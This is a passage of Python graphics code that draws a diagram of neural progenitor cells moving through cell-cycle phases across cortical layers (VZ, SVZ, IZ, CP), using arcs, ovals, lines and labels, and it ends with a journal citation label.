fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 360, 70)
fiber = GArc(5, 110, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 363, 28)
head = GArc(6, 50, 330, 190) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 355, 20)
head = GArc(25, 70, 30, 60) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 362, 22)
nucleus = GArc(40, 50, 70, 180) # left cell nucleus
nucleus.filled = True
nucleus.color = 'orange'
nucleus.fill_color = 'orange'
window.add(nucleus, 350, 315)
nucleus = GArc(35, 50, 255, 180) # right cell body nucleus
nucleus.filled = True
nucleus.color = 'orange'
nucleus.fill_color = 'orange'
window.add(nucleus, 350, 313)
fiber = GArc(9, 40, 80, 180) # second fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 358, 380)
arc = GArc(50, 50, 240, 70)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 345, 398)
def m_cell():
cell = GArc(170, 65, 90, 180) # left cell body
cell.filled = True
cell.color = 'skyblue'
cell.fill_color = 'skyblue'
window.add(cell, 430, 356)
cell = GArc(175, 65, 270, 180) # right cell body
cell.filled = True
cell.color = 'skyblue'
cell.fill_color = 'skyblue'
window.add(cell, 432, 356)
head = GArc(70, 80, 236, 100)
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 433, 328)
fiber = GArc(10, 290, 95, 180) # first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 458, 70)
fiber = GArc(5, 110, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 461, 28)
head = GArc(6, 53, 340, 180) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 453, 20)
head = GArc(25, 90, 30, 60) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 460, 22)
chromosome = GArc(10, 30, 140, 180) # chromosome 1
chromosome.filled = True
chromosome.color = 'orange'
chromosome.fill_color = 'orange'
window.add(chromosome, 473, 360)
chromosome = GArc(10, 20, 60, 190)
chromosome.filled = True
chromosome.color = 'orange'
chromosome.fill_color = 'orange'
window.add(chromosome, 473, 360)
chromosome = GArc(10, 20, 140, 180)
chromosome.filled = True
chromosome.color = 'orange'
chromosome.fill_color = 'orange'
window.add(chromosome, 465, 355)
chromosome = GArc(10, 20, 60, 190)
chromosome.filled = True
chromosome.color = 'orange'
chromosome.fill_color = 'orange'
window.add(chromosome, 465, 370)
chromosome = GArc(10, 30, 140, 180) # chromosome 2
chromosome.filled = True
chromosome.color = 'darkorange'
chromosome.fill_color = 'darkorange'
window.add(chromosome, 473, 368)
chromosome = GArc(10, 20, 60, 190)
chromosome.filled = True
chromosome.color = 'darkorange'
chromosome.fill_color = 'darkorange'
window.add(chromosome, 473, 368)
chromosome = GArc(10, 20, 140, 180)
chromosome.filled = True
chromosome.color = 'darkorange'
chromosome.fill_color = 'darkorange'
window.add(chromosome, 465, 363)
chromosome = GArc(10, 20, 60, 190)
chromosome.filled = True
chromosome.color = 'darkorange'
chromosome.fill_color = 'darkorange'
window.add(chromosome, 465, 378)
chromosome = GArc(10, 30, 140, 180) # chromosome 3
chromosome.filled = True
chromosome.color = 'orange'
chromosome.fill_color = 'orange'
window.add(chromosome, 473, 376)
chromosome = GArc(10, 20, 60, 190)
chromosome.filled = True
chromosome.color = 'orange'
chromosome.fill_color = 'orange'
window.add(chromosome, 473, 376)
chromosome = GArc(10, 20, 140, 180)
chromosome.filled = True
chromosome.color = 'orange'
chromosome.fill_color = 'orange'
window.add(chromosome, 465, 371)
chromosome = GArc(10, 20, 60, 190)
chromosome.filled = True
chromosome.color = 'orange'
chromosome.fill_color = 'orange'
window.add(chromosome, 465, 386)
chromosome = GArc(10, 30, 140, 180) # chromosome 4
chromosome.filled = True
chromosome.color = 'darkorange'
chromosome.fill_color = 'darkorange'
window.add(chromosome, 473, 388)
chromosome = GArc(10, 20, 60, 190)
chromosome.filled = True
chromosome.color = 'darkorange'
chromosome.fill_color = 'darkorange'
window.add(chromosome, 473, 388)
chromosome = GArc(10, 20, 140, 180)
chromosome.filled = True
chromosome.color = 'darkorange'
chromosome.fill_color = 'darkorange'
window.add(chromosome, 465, 383)
chromosome = GArc(10, 20, 60, 190)
chromosome.filled = True
chromosome.color = 'darkorange'
chromosome.fill_color = 'darkorange'
window.add(chromosome, 465, 390)
chromosome = GArc(10, 30, 140, 180) # chromosome 5
chromosome.filled = True
chromosome.color = 'orange'
chromosome.fill_color = 'orange'
window.add(chromosome, 473, 396)
chromosome = GArc(10, 20, 60, 190)
chromosome.filled = True
chromosome.color = 'orange'
chromosome.fill_color = 'orange'
window.add(chromosome, 473, 398)
chromosome = GArc(10, 20, 140, 180)
chromosome.filled = True
chromosome.color = 'orange'
chromosome.fill_color = 'orange'
window.add(chromosome, 465, 390)
chromosome = GArc(10, 20, 60, 190)
chromosome.filled = True
chromosome.color = 'orange'
chromosome.fill_color = 'orange'
window.add(chromosome, 465, 402)
microtubule = GArc(30, 60, 40, 140)
microtubule.color = 'white'
window.add(microtubule, 446, 370)
microtubule = GArc(30, 65, 60, 100)
microtubule.color = 'white'
window.add(microtubule, 446, 380)
microtubule = GArc(30, 50, 190, 140)
microtubule.color = 'white'
window.add(microtubule, 446, 375)
microtubule = GArc(30, 50, 180, 120)
microtubule.color = 'white'
window.add(microtubule, 446, 380)
microtubule = GArc(25, 50, 160, 150)
microtubule.color = 'white'
window.add(microtubule, 446, 380)
microtubule = GArc(25, 50, 240, 100)
microtubule.color = 'white'
window.add(microtubule, 446, 375)
microtubule = GArc(25, 50, 240, 100)
microtubule.color = 'white'
window.add(microtubule, 426, 377)
microtubule = GArc(35, 50, 265, 90)
microtubule.color = 'white'
window.add(microtubule, 426, 377)
microtubule = GArc(35, 50, 195, 90)
microtubule.color = 'white'
window.add(microtubule, 430, 368)
microtubule = GArc(35, 50, 175, 90)
microtubule.color = 'white'
window.add(microtubule, 438, 360)
microtubule = GArc(35, 50, 195, 90) # microtubule right
microtubule.color = 'white'
window.add(microtubule, 505, 380)
microtubule = GArc(35, 45, 170, 90)
microtubule.color = 'white'
window.add(microtubule, 503, 380)
microtubule = GArc(35, 45, 110, 100)
microtubule.color = 'white'
window.add(microtubule, 497, 390)
microtubule = GArc(45, 60, 80, 110)
microtubule.color = 'white'
window.add(microtubule, 490, 390)
microtubule = GArc(40, 50, 60, 110)
microtubule.color = 'white'
window.add(microtubule, 495, 385)
microtubule = GArc(40, 50, 90, 90)
microtubule.color = 'white'
window.add(microtubule, 502, 375)
microtubule = GArc(40, 50, 90, 90)
microtubule.color = 'white'
window.add(microtubule, 502, 375)
microtubule = GArc(20, 40, 60, 145)
microtubule.color = 'white'
window.add(microtubule, 500, 365)
microtubule = GArc(20, 20, 20, 165)
microtubule.color = 'white'
window.add(microtubule, 485, 386)
microtubule = GArc(30, 60, 10, 110)
microtubule.color = 'white'
window.add(microtubule, 480, 380)
microtubule = GArc(40, 70, 5, 120)
microtubule.color = 'white'
window.add(microtubule, 470, 370)
centrosome = GOval(width=5, height=5) # centrosome
centrosome.filled = True
centrosome.color = 'darksalmon'
centrosome.fill_color = 'darksalmon'
window.add(centrosome, 443, 385)
centrosome = GOval(width=5, height=5)
centrosome.filled = True
centrosome.color = 'darksalmon'
centrosome.fill_color = 'darksalmon'
window.add(centrosome, 500, 385)
cell = GArc(95, 65, 90, 180) # left cell body
cell.filled = True
cell.color = 'skyblue'
cell.fill_color = 'skyblue'
window.add(cell, 545, 356)
cell = GArc(100, 60, 270, 180) # right cell body
cell.filled = True
cell.color = 'skyblue'
cell.fill_color = 'skyblue'
window.add(cell, 545, 360)
head = GArc(70, 80, 236, 70)
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 549, 328)
nucleus = GOval(width=25, height=40)
nucleus.filled = True
nucleus.color = 'orange'
nucleus.fill_color = 'orange'
window.add(nucleus, 555, 370)
fiber = GArc(10, 290, 95, 180) # first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 567, 70)
fiber = GArc(5, 110, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 568, 28)
head = GArc(6, 53, 340, 180) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 560, 20)
head = GArc(25, 90, 30, 62) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 567, 28)
fiber = GArc(7, 10, 75, 180) # on second fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 568, 415)
cell = GArc(95, 70, 90, 180) # left cell body
cell.filled = True
cell.color = 'steelblue'
cell.fill_color = 'steelblue'
window.add(cell, 573, 305)
cell = GArc(100, 70, 270, 180) # right cell body
cell.filled = True
cell.color = 'steelblue'
cell.fill_color = 'steelblue'
window.add(cell, 573, 305)
head = GArc(70, 90, 60, 86)
head.filled = True
head.color = 'steelblue'
head.fill_color = 'steelblue'
window.add(head, 579, 358)
fiber = GArc(12, 80, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'steelblue'
fiber.fill_color = 'steelblue'
window.add(fiber, 598, 345)
arc = GArc(70, 60, 250, 60)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 582, 393)
nucleus = GOval(width=25, height=40)
nucleus.filled = True
nucleus.color = 'orange'
nucleus.fill_color = 'orange'
window.add(nucleus, 585, 320)
def g1_cell():
neuron = GOval(width=40, height=60)
neuron.filled = True
neuron.color = 'skyblue'
neuron.fill_color = 'skyblue'
window.add(neuron, 650, 280)
arc = GArc(50, 80, 250, 200)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 660, 270)
arc = GArc(55, 95, 70, 210)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 650, 265)
arc = GArc(40, 70, 80, 200)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 646, 280)
arc = GArc(35, 110, 45, 85)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 660, 340)
fiber = GArc(10, 210, 95, 180) # first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 675, 70)
arc = GArc(7, 110, 270, 260) # on first fiber
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 671, 60)
fiber = GArc(9, 110, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 673, 28)
head = GArc(6, 40, 330, 200) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 666, 25)
head = GArc(5, 55, 200, 170) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 677, 20)
fiber = GArc(7, 80, 95, 180) # second fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 670, 340)
arc = GArc(35, 80, 230, 90) # cell bottom
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 659, 386)
arc = GArc(35, 110, 215, 95) # cell head
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 662, 225)
nucleus = GOval(width=25, height=45)
nucleus.filled = True
nucleus.color = 'orange'
nucleus.fill_color = 'orange'
window.add(nucleus, 655, 290)
body = GOval(width=40, height=40)
body.filled = True
body.color = 'steelblue'
body.fill_color = 'steelblue'
window.add(body, 700, 190)
arc = GArc(10, 60, 60, 250) # foot 1
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 718, 150)
head = GArc(50, 60, 230, 70)
head.filled = True
head.color = 'steelblue'
head.fill_color = 'steelblue'
window.add(head, 707, 167)
arc = GArc(250, 100, 150, 25) # foot 2
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 658, 190)
head = GArc(50, 60, 300, 70)
head.filled = True
head.color = 'steelblue'
head.fill_color = 'steelblue'
window.add(head, 682, 184)
arc = GArc(260, 110, 150, 25) # foot 3
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 725, 195)
head = GArc(50, 70, 150, 80)
head.filled = True
head.color = 'steelblue'
head.fill_color = 'steelblue'
window.add(head, 732, 184)
arc = GArc(15, 45, 150, 160) # foot 4
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 730, 208)
arc = GArc(12, 80, 50, 160) # foot 5
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 700, 224)
nucleus = GOval(width=20, height=22)
nucleus.filled = True
nucleus.color = 'orange'
nucleus.fill_color = 'orange'
window.add(nucleus, 712, 195)
def g1_s2_cell():
neuron = GOval(width=40, height=60)
neuron.filled = True
neuron.color = 'skyblue'
neuron.fill_color = 'skyblue'
window.add(neuron, 800, 280)
arc = GArc(50, 80, 250, 200)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 810, 270)
arc = GArc(55, 95, 70, 210)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 800, 265)
arc = GArc(40, 70, 80, 200)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 796, 280)
arc = GArc(35, 110, 45, 85)
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 810, 340)
fiber = GArc(10, 210, 95, 180) # first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 825, 70)
fiber = GArc(9, 110, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 823, 28)
head = GArc(6, 40, 330, 200) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 816, 25)
head = GArc(5, 55, 200, 170) # on first fiber head
head.filled = True
head.color = 'skyblue'
head.fill_color = 'skyblue'
window.add(head, 827, 20)
fiber = GArc(7, 80, 95, 180) # second fiber
fiber.filled = True
fiber.color = 'skyblue'
fiber.fill_color = 'skyblue'
window.add(fiber, 820, 340)
arc = GArc(35, 80, 230, 90) # cell bottom
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 809, 386)
arc = GArc(35, 110, 215, 95) # cell head
arc.filled = True
arc.color = 'skyblue'
arc.fill_color = 'skyblue'
window.add(arc, 812, 225)
nucleus = GOval(width=25, height=45)
nucleus.filled = True
nucleus.color = 'orange'
nucleus.fill_color = 'orange'
window.add(nucleus, 805, 290)
neuron = GArc(120, 60, 270, 180)
neuron.filled = True
neuron.color = 'steelblue'
neuron.fill_color = 'steelblue'
window.add(neuron, 810, 150)
neuron = GArc(35, 60, 90, 180)
neuron.filled = True
neuron.color = 'steelblue'
neuron.fill_color = 'steelblue'
window.add(neuron, 830, 150)
fiber = GArc(20, 90, 270, 190)
fiber.filled = True
fiber.color = 'steelblue'
fiber.fill_color = 'steelblue'
window.add(fiber, 826, 70)
fiber = GArc(50, 70, 140, 90)
fiber.filled = True
fiber.color = 'steelblue'
fiber.fill_color = 'steelblue'
window.add(fiber, 832, 115)
fiber = GArc(15, 105, 270, 190)
fiber.filled = True
fiber.color = 'steelblue'
fiber.fill_color = 'steelblue'
window.add(fiber, 828, 170)
arc = GArc(160, 11, 120, 210) # foot
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 830, 271)
head = GArc(50, 70, 240, 50)
head.filled = True
head.color = 'steelblue'
head.fill_color = 'steelblue'
window.add(head, 823, 245)
arc = GArc(15, 100, 190, 100)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 920, 251)
arc = GArc(10, 45, 190, 100)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 950, 255)
nucleus = GOval(width=20, height=30)
nucleus.filled = True
nucleus.color = 'orange'
nucleus.fill_color = 'orange'
window.add(nucleus, 840, 165)
def lines():
line = GLine(50, 425, 1150, 425)
line.color = 'gray'
window.add(line)
line = GLine(50, 18, 1150, 18)
line.color = 'gray'
window.add(line)
line = GLine(50, 300, 1150, 300)
line.color = 'gray'
window.add(line)
line = GLine(50, 190, 1150, 190)
line.color = 'gray'
window.add(line)
def neurons():
cell = GArc(80, 80, 80, 180) # left cell body
cell.filled = True
cell.color = 'lightblue'
cell.fill_color = 'lightblue'
window.add(cell, 1050, 300)
cell = GArc(80, 80, 265, 180) # right cell body
cell.filled = True
cell.color = 'lightblue'
cell.fill_color = 'lightblue'
window.add(cell, 1048, 298)
bottom = GArc(50, 50, 50, 80)
bottom.filled = True
bottom.color = 'lightblue'
bottom.fill_color = 'lightblue'
window.add(bottom, 1054, 370)
head = GArc(50, 60, 230, 70)
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 1060, 277)
# fiber = GArc(10, 240, 95, 180) # first fiber
# fiber.filled = True
# fiber.color = 'lightblue'
# fiber.fill_color = 'lightblue'
# window.add(fiber, 1070, 70)
# fiber = GArc(5, 110, 75, 180) # on first fiber
# fiber.filled = True
# fiber.color = 'lightblue'
# fiber.fill_color = 'lightblue'
# window.add(fiber, 1073, 28)
head = GArc(6, 50, 330, 190) # on first fiber head
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 1065, 20)
head = GArc(25, 70, 30, 60) # on first fiber head
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 1072, 22)
nucleus = GArc(40, 50, 70, 180) # left cell nucleus
nucleus.filled = True
nucleus.color = 'wheat'
nucleus.fill_color = 'wheat'
window.add(nucleus, 1060, 315)
nucleus = GArc(35, 50, 255, 180) # right cell body nucleus
nucleus.filled = True
nucleus.color = 'wheat'
nucleus.fill_color = 'wheat'
window.add(nucleus, 1060, 313)
fiber = GArc(9, 40, 80, 180) # second fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 1068, 380)
arc = GArc(50, 50, 240, 70)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1055, 398)
neuron = GOval(width=40, height=60)
neuron.filled = True
neuron.color = 'lightblue'
neuron.fill_color = 'lightblue'
window.add(neuron, x=990, y=280)
line = GLine(140, 1090, 140, 1090)
line.color = 'gray'
window.add(line)
arc = GArc(50, 80, 250, 200)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1000, 270)
arc = GArc(55, 95, 70, 210)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 990, 265)
arc = GArc(40, 70, 80, 200)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 986, 280)
arc = GArc(35, 110, 45, 85)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1000, 340)
fiber = GArc(10, 210, 95, 180) # first fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 1015, 70)
arc = GArc(7, 110, 270, 260) # on first fiber
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1011, 60)
fiber = GArc(9, 110, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 1013, 28)
head = GArc(6, 40, 330, 200) # on first fiber head
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 1006, 25)
head = GArc(5, 55, 200, 170) # on first fiber head
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 1017, 20)
fiber = GArc(7, 80, 95, 180) # second fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 1010, 340)
arc = GArc(35, 80, 230, 90) # cell bottom
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 999, 386)
arc = GArc(35, 110, 215, 95) # cell head
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1002, 225)
nucleus = GOval(width=25, height=45)
nucleus.filled = True
nucleus.color = 'wheat'
nucleus.fill_color = 'wheat'
window.add(nucleus, x=995, y=290)
neuron = GOval(width=40, height=60)
neuron.filled = True
neuron.color = 'lightblue'
neuron.fill_color = 'lightblue'
window.add(neuron, x=1090, y=280)
line = GLine(140, 1190, 140, 1190)
line.color = 'gray'
window.add(line)
arc = GArc(50, 80, 250, 200)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1100, 270)
arc = GArc(55, 95, 70, 210)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1090, 265)
arc = GArc(40, 70, 80, 200)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1086, 280)
arc = GArc(35, 110, 45, 85)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1100, 340)
fiber = GArc(10, 210, 95, 180) # first fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 1115, 70)
arc = GArc(7, 110, 270, 260) # on first fiber
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1111, 60)
fiber = GArc(9, 110, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 1113, 28)
head = GArc(6, 40, 330, 200) # on first fiber head
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 1106, 25)
head = GArc(5, 55, 200, 170) # on first fiber head
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 1117, 20)
fiber = GArc(7, 80, 95, 180) # second fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 1110, 340)
arc = GArc(35, 80, 230, 90) # cell bottom
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1099, 386)
arc = GArc(35, 110, 215, 95) # cell head
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1102, 225)
nucleus = GOval(width=25, height=45)
nucleus.filled = True
nucleus.color = 'wheat'
nucleus.fill_color = 'wheat'
window.add(nucleus, x=1095, y=290)
neuron = GOval(width=40, height=70)
neuron.filled = True
neuron.color = 'lightblue'
neuron.fill_color = 'lightblue'
window.add(neuron, x=1038, y=227)
neuron = GOval(width=40, height=50)
neuron.filled = True
neuron.color = 'lightblue'
neuron.fill_color = 'lightblue'
window.add(neuron, x=1031, y=240)
arc = GArc(55, 65, 60, 200)
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1021, 230)
arc = GArc(80, 100, 210, 85) # neuron head
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1035, 192)
fiber = GArc(10, 210, 95, 180) # first fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 1060, 70)
fiber = GArc(5, 110, 75, 180) # on first fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 1063, 28)
head = GArc(6, 40, 330, 200) # on first fiber head
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 1055, 25)
head = GArc(25, 70, 30, 70) # on first fiber head
head.filled = True
head.color = 'lightblue'
head.fill_color = 'lightblue'
window.add(head, 1062, 22)
fiber = GArc(9, 140, 80, 180) # second fiber
fiber.filled = True
fiber.color = 'lightblue'
fiber.fill_color = 'lightblue'
window.add(fiber, 1042, 290)
arc = GArc(30, 80, 230, 90) # cell bottom
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1031, 386)
arc = GArc(35, 80, 22, 113) # cell bottom
arc.filled = True
arc.color = 'lightblue'
arc.fill_color = 'lightblue'
window.add(arc, 1031, 283)
arc = GArc(57, 45, 60, 170) # cell bottom
arc.filled = True
arc.color = 'wheat'
arc.fill_color = 'wheat'
window.add(arc, 1033, 233)
arc = GArc(50, 50, 250, 150) # cell bottom
arc.filled = True
arc.color = 'wheat'
arc.fill_color = 'wheat'
window.add(arc, 1032, 228)
neuron = GOval(width=40, height=45)
neuron.filled = True
neuron.color = 'steelblue'
neuron.fill_color = 'steelblue'
window.add(neuron, x=1029, y=64)
arc = GArc(100, 100, 240, 60)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 1026, 23)
arc = GArc(135, 135, 350, 60)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 975, 70)
arc = GArc(145, 130, 130, 60)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 1052, 70)
fiber = GArc(20, 50, 270, 190)
fiber.filled = True
fiber.color = 'steelblue'
fiber.fill_color = 'steelblue'
window.add(fiber, 1040, 24)
arc = GArc(175, 17, 80, 130)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 980, 98)
arc = GArc(180, 15, 300, 150)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 1030, 95)
nucleus = GOval(20, 25)
nucleus.filled = True
nucleus.color = 'orange'
nucleus.fill_color = 'orange'
window.add(nucleus, 1040, 70)
neuron = GOval(width=40, height=45)
neuron.filled = True
neuron.color = 'steelblue'
neuron.fill_color = 'steelblue'
window.add(neuron, x=1089, y=74)
arc = GArc(100, 100, 240, 60)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 1086, 33)
arc = GArc(135, 135, 350, 60)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 1035, 80)
arc = GArc(145, 130, 130, 60)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 1112, 80)
fiber = GArc(20, 50, 270, 190)
fiber.filled = True
fiber.color = 'steelblue'
fiber.fill_color = 'steelblue'
window.add(fiber, 1100, 34)
arc = GArc(175, 17, 80, 130)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 1040, 108)
arc = GArc(180, 15, 300, 150)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 1090, 105)
nucleus = GOval(20, 25)
nucleus.filled = True
nucleus.color = 'orange'
nucleus.fill_color = 'orange'
window.add(nucleus, 1100, 80)
neuron = GOval(width=40, height=45)
neuron.filled = True
neuron.color = 'steelblue'
neuron.fill_color = 'steelblue'
window.add(neuron, x=969, y=84)
arc = GArc(100, 100, 240, 60)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 966, 43)
arc = GArc(135, 135, 350, 60)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 915, 90)
arc = GArc(145, 130, 130, 60)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 992, 90)
fiber = GArc(20, 70, 270, 190)
fiber.filled = True
fiber.color = 'steelblue'
fiber.fill_color = 'steelblue'
window.add(fiber, 980, 24)
arc = GArc(175, 17, 80, 130)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 920, 118)
arc = GArc(180, 15, 300, 150)
arc.filled = True
arc.color = 'steelblue'
arc.fill_color = 'steelblue'
window.add(arc, 970, 115)
nucleus = GOval(20, 25)
nucleus.filled = True
nucleus.color = 'orange'
nucleus.fill_color = 'orange'
window.add(nucleus, 980, 90)
def word():
label = GLabel('G1/S')
label.font = '-15'
label.filled = True
label.color = 'black'
window.add(label, 120, 460)
label = GLabel('S')
label.font = '-15'
label.filled = True
label.color = 'black'
window.add(label, 240, 460)
label = GLabel('G2')
label.font = '-15'
label.filled = True
label.color = 'black'
window.add(label, 350, 460)
label = GLabel('M')
label.font = '-15'
label.filled = True
label.color = 'black'
window.add(label, 520, 460)
label = GLabel('G1')
label.font = '-15'
label.filled = True
label.color = 'black'
window.add(label, 690, 460)
label = GLabel('G1/S')
label.font = '-15'
label.filled = True
label.color = 'black'
window.add(label, 810, 460)
label = GLabel('VZ')
label.font = '-15'
label.filled = True
label.color = 'black'
window.add(label, 50, 370)
label = GLabel('SVZ')
label.font = '-15'
label.filled = True
label.color = 'black'
window.add(label, 45, 250)
label = GLabel('IZ')
label.font = '-15'
label.filled = True
label.color = 'black'
window.add(label, 52, 175)
label = GLabel('CP')
label.font = '-15'
label.filled = True
label.color = 'black'
window.add(label, 52, 55)
citation = GLabel('J Cell Biol. 2005 Sep 12;170(6):935-45.')
citation.font = '-8'
